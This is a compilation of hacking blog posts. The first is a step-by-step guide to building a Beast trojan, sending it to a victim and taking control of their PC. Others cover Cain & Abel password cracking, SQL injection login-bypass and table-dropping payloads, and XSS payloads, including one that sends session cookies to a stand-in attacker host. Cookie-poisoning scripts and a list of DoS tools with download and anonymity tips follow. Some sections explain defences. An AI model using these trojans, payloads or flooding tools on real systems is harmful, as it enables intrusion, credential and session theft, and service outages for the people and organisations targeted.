Hack others computer using Beast trojan

Step 1:- Download the necessary software  Beast 2.07

Step 2:- Open the software

Step 3:- Now click on “Build server “button.

Step 4:- Now in this window click on the notifications tab.
Step 5:- In the notifications tab click on the e-mail button.
Step 6:- Now In this window fill your proper and valid email id

Step 7:- Now go to "AV-FW kill” tab.

Step 8: - Now In this put a tick mark on the “disable XP firewall ".

Step 9:-Now click on "EXE icon” tab.
Step 10:- Select any icon and click on the ”Save Server” button and the Trojan will be made.

 Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim will install the Trojan on his system you will get a notification e-mail on your specified e-mail id while making the Trojan. This Email consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.

Step 14:- After That Click on the "Go Beast” Button and You will be connected to victims PC.

Step 15:- Now select the action or task you want to execute on victims PC form the given list.

Step 16:- Now to destroy or kill the Trojan click on the “server “tab from the menu.

Step 17:-Now click on the “Kill Server “button and the Trojan will be destroyed from the victims PC.

 Step 18:- You are Done Now.

Read More

How to Hack Computer Password using Cain and Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

First download cain & abel software.

Open cain and abel click on cracker option.

 Select LM & NTLM Hashes and click “+” sign

Click on Next

I want to recover password of “raaz” user name then right click on raaz> Brute Force Attack > NTLM Hashes.

Now you will see window similar to below image. Click on start.

After successfully finished performing password recovery it will show you password like in the image below.

Read More

SQL Injections Attack with Examples

This article explains basics of SQL Injection with an example that shows SQL Injection, and provides methods to prevent from these attacks.

As the name suggests, this attack can be done with SQL queries. Many web developers are unaware of how an attacker can tamper with the SQL queries. SQL-Injection can be done on a web application which doesn’t filter the user inputs properly and trusts whatever the user provides. The idea of SQL injection is to make the application to run undesired SQL queries.

All the examples mentioned in this article are tested with the following:

• PHP 5.3.3-7
• Apache/2.2.16
• Postgresql 8.4

SQL Injection Example

Most of the web application has a login page. So we will start with that. Let us assume the following code was written by the application.

index.html:

<html>
<head><title>SQL Injection Demo</title></head>
 <body onload="document.getElementById('user_name').focus();" >
 <form name="login_form" id="login_form" method="post" action="login.php">
  <table border=0 align="center" >
   <tr>
    <td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>
   </tr>
   <tr>
    <td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name" value=""></td>
   </tr>
   <tr>
    <td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word" value=""></td>
   </tr>
   <tr>
    <td colspan=2 align="center"><input type="submit" value="Login"> </div></td>
   </tr>
  </table>
 </form>
</body>
</html>

When the user enters the user_name and pass_word, it will be posted to login.php via HTTP_POST method.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'john';
$User= 'john';
$Password= 'xxx';
$Schema = 'test'; 

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; 

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); 

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
} 

$query="SELECT * from $Schema.users where user_name='".$_POST['user_name']."' and password='".$_POST['pass_word']."';"; 

$result=pg_query($Connect,$query);
$rows = pg_num_rows($result);
if ($rows) {
 echo "Login Success";
}
else {
 echo "Login Failed";
}
?>

The line number 19 in the above code is vulnerable to SQL-Injection (i.e the line that starts with “$query=”SELECT *..”). The SQL query is designed to match the given username and password with the database. It will work properly if the user provides valid username and password. But an attacker can craft the input as follows:

In username field, instead of providing a username the attcker can enter the following.

' or 1=1;--

The attacker than then leave the password field be empty.

When the attacker clicks submit, the details will be posted to login.php. In login.php the query will be framed as follows:

SELECT * from test.members where user_name='' or 1=1;--' and password='';

The above one is a valid SQL query. In postgresql – is the comment character. So the statements after – will be treated as comments and it will not be executed. Now the postgresql will execute

select * from test.members where user_name='' or 1=1;

This will return true and give “Login Success” message.

If the attacker knows the database tables name, then he can even drop those tables by giving the following input in the username field.

';drop table test.lop;--

Some login application, tends to do the following.

• Stored the password as md5 in the database
• First select the username,password from the database based on the username provided.
• Then md5 the password given by the user, and compare it with the password got from database.
• If both are matched, then login is success.

Let’s see how we can bypass that if the query is vulnerable to SQL-Injection.

login.php:

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; 

$result=pg_query($Connect,$query); 

$row=pg_fetch_array($result,NULL,PGSQL_ASSOC); 

# Find the md5 for the user supplied password.
$user_pass = md5($_POST['pass_word']); 

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login Failed\n";
}
else {
 echo "Login Success\n";
}

Now enter the following in the username field

' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70

Enter “123” in the password field and click submit. md5(123) is 202cb962ac59075b964b07152d234b70

Now the query would expand as follows:

SELECT user_name,password from test.members where user_name='' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70';

When the above query is executed, the database will return ‘laksh’ as the username and ‘ 202cb962ac59075b964b07152d234b70′ as password.

We also posted “123” in the pass_word field. So the strcmp will return 0 and the authentication will be success.

The above are just couple of examples of SQL injection attacks. There are lot of these variations. Following are some of the things you can do to reduce the possibility of SQL-Injection attacks.

• Strict type checking ( Don’t trust what the user enters )
• If you expect user name to be entered, then validate whether it contains only alpha numerals.
• Escape or filter the special characters and user inputs.
• Use prepared statements to execute the queries.
• Don’t allow multiple queries to be executed on a single statement.
• Don’t leak the database information to the end user by displaying the “syntax errors”, etc.

Read More

Cross-site Scripting with Examples

In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a different kind of attack called XXS attacks.

XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting

XSS attacks are broadly classified into 2 types:

Non-Persistent
Persistent

1. Non-Persistent XSS Attack

In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS

index.php:

<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://xssattackexamples.com/">Click to Download</a>";
?>

Example 1:
Now the attacker will craft an URL as follows and send it to the victim:

index.php?name=guest<script>alert('attacked')</script>

When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.

Example 2:

For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the <a> tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the <a> tag is echoed

index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script>

Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

which is same as

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.

2. Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.

When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.

Examples for Persistent XSS Attack

This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:

There are two types of users: “Admin” and “Normal” user.

• When “Admin” log-in, he can see the list of usernames. 
• When “Normal” users log-in, they can only update their display name.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
}

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";

$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);

$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login failed";
}
else {
 # Start the session
 session_start();
 $_SESSION['USER_NAME'] = $user_name;
 echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?>

home.php

<?php
session_start();
if(!$_SESSION['USER_NAME']) {
 echo "Need to login";
}
else {
 $Host= '192.168.1.8';
 $Dbname= 'app';
 $User= 'yyy';
 $Password= 'xxx';
 $Schema = 'test';
 $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
 $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
 if($_SERVER['REQUEST_METHOD'] == "POST") {
  $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";
  pg_query($Connect,$query);
  echo "Update Success";
 }
 else {
  if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
   echo "Welcome admin<br><hr>";
   echo "List of user's are<br>";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]<br>";
   }
 }
 else {
  echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
  echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
  echo "<input type=\"submit\" value=\"Update\">";
 }
}
}
?>

Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:

<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>

The above information entered by the attacker will be stored in the database (persistent).

Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:

xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3

Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.

To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3″.

Read More

Cookie Poisoning

Web site cookie poisoning came up twice in the last week while testing so I guess now is great time to talk about how to test the for the vulnerability of cookie poisoning. I'm not going to get into the details of how a cookie works but rather how to poison them. If you want details of how they work from a testing point of view read this respectable paper.

Web sites use cookies (a lot of them), cookies can be permanent (on disk) or temporary (in memory), and cookies contain variables; variables that the site cares about, and can be messed with or "poisoned" to get results that the Web site didn't intend to give you. Use the following test page as an example, The test pages are simple, if you have the right cookie content then you will receive a 50% discount; if the content isn't right then you will not receive the 50% discount. The first page sets the cookie with the content of "SpecialOffer=No" indicating that you are not eligible by default. The cookie setting code on this page is simple and looks like this:

<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>

Now, if you click the link "Click here to see if you are eligible for 50% discount" you'll see that you are not eligible for the discount. The check on the 2nd page is pretty simple too and looks like this:

<SCRIPT>
var pos = document.cookie.indexOf( "SpecialOffer=Yes" );
if( pos == -1 ) {
document.write("I'm sorry you are NOT eligible for the 50% discount");
}
else {
document.write("You are eligible for the 50% discount");
}
</SCRIPT>

In the above script I look for the value of "SpecialOffer=Yes" in the cookie content and then react accordingly. If I don't see "SpecialOffer=Yes" then you aren't eligible for the discount. Now, on to the fun stuff! How do you make yourself eligible for the discount? To do this we need to change the default cookie content value from "SpecialOffer=No" to "SpecialOffer=Yes". How does one change cookie values? There are quite a few ways but I'll share with you my 3 favorites:

1. Add N Edit Cookies FireFox extension
2. Paros Proxy
3. Paste the following JavaScript in the URL bar to view the cookies:
javascript:alert(document.cookie.split(';').join(' \n'))

and the following to modify it:

javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c=c.substring(1,((c.indexOf("; ")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace (v,nv);document.cookie=n+"="+escape(nc);return unescape (document.cookie);});alert(c(prompt("cookie name:",""), prompt("replace this value:",""),prompt("with::","")));

How to poison cookies with Add N Edit Cookies

1. Navigate to http://www.qainsight.net/examples/cookietest.htm in FireFox
2. Click the cookie icon in your FireFox toolbar
3. Find the cookie for www.QAInsight.net and double click it or highlight it and press the edit button
4. Change the content form field from "No" to "Yes" (case sensitive)
5. Go back to the browser and click the link "Click here to see if you are eligible for 50% discount"
6. KaaaaPOW.... You now have the 50% discount! You're a freakin' evil, bad to the bone tester!

How to poison cookies with Paros Proxy
Typically I wouldn't use Paros in this situation because the cookie is being set on the client side (you won't see this too much in the real world). The following example isn't what I consider cookie poisoning but more JavaScript manipulation. The following assumes you have cleared your cache:

1. Turn on Paros and set you IE connection options to use the address of 127.0.0.1 with a port of 8080
2. In Paros click the "Trap" tab and check the "Trap Request" and "Trap Response" checkboxes
3. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
4. Go back to Paros (Trap tab) and press the "continue" button until you see the following text in the bottom pane:
<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
5. Change the "No" to "Yes" in the above line
6. Click the "Continue" button.
7. Go back to IE and click the link "Click here to see if you are eligible for 50% discount"
8. Whoot! You now have the 50% discount! You're one sexy cool tester with a severity 1 defect that needs to be submitted.

There are situations where you will want to change the cookie value in the header (the top pane in the trap tab) on the response or the request, this is when you would use Paros over Add n Edit Cookies. Situations where you would need to manipulate the cookie before the response is rendered or before the request is sent due to the server or client side code manipulating the cookie.

How to poison cookies with JavaScript

1. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
2. To view the set cookie, type the following in the URL bar:
javascript:alert(document.cookie.split(';').join(' \n'))
3. You will see "SpecialOffer=No". Click Ok
4. Copy and paste the following JavaScript in the browser URL bar:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c= c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length)); nc=unescape(c).replace(v,nv); document.cookie= n+"="+escape(nc);return unescape(document.cookie);}); alert(c(prompt("cookie name:",""), prompt("replace this value:",""), prompt("with::","")));
5. Hit the enter key
6. Click the Ok button at the JavaScript Alert
7. Type the cookie name of SpecialOffer in the Alert box and click the Ok button
8. At the "replace this value" script prompt type No and press the Ok button
9. At the "with:" script prompt type Yes (case sensitive) and press the Ok button
10. The next alert will show you the replaced cookie. You should see: SpecialOffer=Yes
11. Click the Ok button
12. In IE click the link "Click here to see if you are eligible for 50% discount"
13. DingDingDingDing.... You're a winner! You now have the 50% discount! You're quite the bad-ass tester aren't you? You're like the wicked witch in Snow White but instead of poisoning apples you poison cookies.

And that's how I conduct cookie poisoning when testing. Not too awful tough eh? Oh...if I ever get confused about the state of cookies before and after poisoning I use HTTPWatch to get a better idea of what is going on. I can usually get the gist of it by looking through the cookie and header tabs.

When do you test for the cookie poisoning vulnerability you ask? Whenever there is a cookie being used! Is it a defect if you can manipulate the cookie? Not necessarily. They typically are defects when a cookie is being placed that impacts or restricts the site's behavior and you can exploit that feature. If you manipulate a cookie and it doesn't gain you anything or exploit a feature then it's not of much value, thus not a defect. But...it's important that you know what the cookie you are poisoning does, without knowing what the cookie does you may be poisoning something and may not be seeing that exploit. To prevent guess-work it's easiest if you work with your developer to understand what he/she is doing with cookies on the site so you can go straight for the kill.

Happy poisoning!

Read More

Denial-of-Service (DoS) Attack and Free DoS Attacking Tools

The denial of service (DOS) attack is one of the most powerful attacks used by hackers to harm a company or organization. Don’t confuse a DOS attack with DOS, the disc operating system developed by Microsoft. This attack is one of most dangerous cyber attacks. It causes service outages and the loss of millions, depending on the duration of attack. In past few years, the use of the attack has increased due to the availability of free tools. This tool can be blocked easily by having a good firewall. But a widespread and clever DOS attack can bypass most of the restrictions. In this post, we will see more about the DOS attack, its variants, and the tools that are used to perform the attack. We will also see how to prevent this attack and how not to be the part of this attack.

What Is a Denial of Service Attack?

A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.

In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.


DDOS or Distributed Denial of Service Attack

This is the complicated but powerful version of DOS attack in which many attacking systems are involved. In DDOS attacks, many computers start performing DOS attacks on the same target server. As the DOS attack is distributed over large group of computers, it is known as a distributed denial of service attack.

To perform a DDOS attack, attackers use a zombie network, which is a group of infected computers on which the attacker has silently installed the DOS attacking tool. Whenever he wants to perform DDOS, he can use all the computers of ZOMBIE network to perform the attack.

In simple words, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.

There are basically three types of DDOS attacks:

Application-layer DDOS attack
Protocol DOS attack
Volume-based DDOS attack

Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.

Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.

Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.

There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.

Free DOS Attacking Tools

1. LOIC (Low Orbit Ion Canon)

LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.

It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.

You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.

This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.

The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.

Download LOIC


2. XOIC

XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.

In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.

It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.

Download XOIC

3. HULK (HTTP Unbearable Load King)

HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.

It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.

The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.

Download HULK


4. DDOSIM—Layer 7 DDOS Simulator

DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.

This tool is written in C++ and runs on Linux systems.

These are main features of DDOSIM

Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here

Read more about this tool here

5. R-U-Dead-Yet

R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.

Download RUDY

6. Tor’s Hammer

Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.

Download TOR’s Hammer here

7. PyLoris

PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.

Download PyLoris

8. OWASP DOS HTTP POST

It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.

Download here

9. DAVOSET

DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.

Download DavoSET

10. GoldenEye HTTP Denial Of Service Tool

GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.

Download GoldenEye

Read More